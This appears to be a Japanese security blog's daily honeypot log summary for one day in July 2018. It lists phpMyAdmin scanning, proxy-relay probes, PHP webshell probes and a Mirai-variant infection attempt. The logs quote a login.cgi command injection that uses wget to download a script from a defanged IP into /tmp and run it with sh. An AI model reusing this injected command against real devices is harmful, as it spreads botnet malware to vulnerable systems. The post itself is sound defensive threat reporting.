S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(29日目)

WOWHoneypotの簡易分析(29日目)

honeypot

WOWhoneypotの2018/07/02(月) (運用29日目)の簡易分析です。


本日の総アクセス件数は143件です。以下が全アクセスログです。

43 2018-07-02 GET /
12 2018-07-02 HEAD /
2 2018-07-02 GET /xampp/phpmyadmin/index.php
2 2018-07-02 GET /web/phpMyAdmin/index.php
2 2018-07-02 GET /typo3/phpmyadmin/index.php
2 2018-07-02 GET /tools/phpMyAdmin/index.php
2 2018-07-02 GET /pmd/index.php
2 2018-07-02 GET /pma-old/index.php
2 2018-07-02 GET /pmamy/index.php
2 2018-07-02 GET /pmamy2/index.php
2 2018-07-02 GET /pma/index.php
2 2018-07-02 GET /PMA2/index.php
2 2018-07-02 GET /phpmyadmin/phpmyadmin/index.php
2 2018-07-02 GET /phpMyAdminold/index.php
2 2018-07-02 GET /phpMyAdmin.old/index.php
2 2018-07-02 GET /phpmyadmin-old/index.php
2 2018-07-02 GET /phpMyAdmin/index.php
2 2018-07-02 GET /phpmyadmin/index.php
2 2018-07-02 GET /phpMyadmin_bak/index.php
2 2018-07-02 GET /phpmyadmin2/index.php
2 2018-07-02 GET /phpmyadmin1/index.php
2 2018-07-02 GET /phpmyadmin0/index.php
2 2018-07-02 GET /phpma/index.php
2 2018-07-02 GET /phpadmin/index.php
2 2018-07-02 GET /mysql/index.php
2 2018-07-02 GET /mysqladmin/index.php
2 2018-07-02 GET /mysql-admin/index.php
2 2018-07-02 GET /myadmin2/index.php
2 2018-07-02 GET /index.php
2 2018-07-02 GET /db/index.php
2 2018-07-02 GET /dbadmin/index.php
2 2018-07-02 GET /claroline/phpMyAdmin/index.php
2 2018-07-02 GET /admin/PMA/index.php
2 2018-07-02 GET /admin/pma/index.php
2 2018-07-02 GET /admin/phpMyAdmin/index.php
2 2018-07-02 GET /admin/phpmyadmin/index.php
2 2018-07-02 GET /admin/phpmyadmin2/index.php
2 2018-07-02 GET /admin/mysql/index.php
2 2018-07-02 GET /admin/index.php
2 2018-07-02 CONNECT v270lapisdtz9oirblf.gumi[.]sg:443
1 2018-07-02 PROPFIND /
1 2018-07-02 POST /xx.php
1 2018-07-02 POST /xw.php
1 2018-07-02 POST /wuwu11.php
1 2018-07-02 POST /w.php
1 2018-07-02 POST /s.php
1 2018-07-02 POST /sheep.php
1 2018-07-02 POST /db_session.init.php
1 2018-07-02 POST /db.init.php
1 2018-07-02 GET /webdav/
1 2018-07-02 GET /phpMyAdmin/phpMyAdmin/index.php
1 2018-07-02 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

 phpMyAdmin関連と/を除外したアクセス数です。

2 2018-07-02 CONNECT v270lapisdtz9oirblf.gumi[.]sg:443
1 2018-07-02 POST /xx.php
1 2018-07-02 POST /xw.php
1 2018-07-02 POST /wuwu11.php
1 2018-07-02 POST /w.php
1 2018-07-02 POST /s.php
1 2018-07-02 POST /sheep.php
1 2018-07-02 POST /db_session.init.php
1 2018-07-02 POST /db.init.php
1 2018-07-02 GET /webdav/
1 2018-07-02 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ 

珍しいのはCONNECTメソッドを利用した不正中継の調査行為でしょうか。

他はPHP脆弱性をつくPOST8種、WebDAVの調査行為、Mirai亜種Shinoaの感染拡大行為、となります。 

 

本日のハンティングログは以下です。Mirai亜種Shinoaのものです。

1 2018-07-02 wget hxxp://185.62.190[.]191/r

以上です。